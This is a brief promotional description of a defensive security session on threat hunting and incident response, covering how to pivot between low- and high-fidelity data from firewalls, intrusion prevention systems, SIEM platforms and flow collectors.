You have lots of security related data, and it’s not all created equal. Effective threat hunting and incident response requires you to quickly and efficiently pivot between the low- and high-fidelity data that exists across firewalls, intrusion prevention systems, security information event management platforms, flow collectors etc. Understanding the common data elements across these disparate systems allows your team to efficiently pivot from low fidelity data used for rapid root cause analysis to high fidelity data that can be a means of conviction.
In this session, we will:
- Explore examples of low, medium and high fidelity security data
- Define data pivots and provide real world examples
- Discuss the steps for creating pivot tables
- Demonstrate how data pivots greatly improve incident response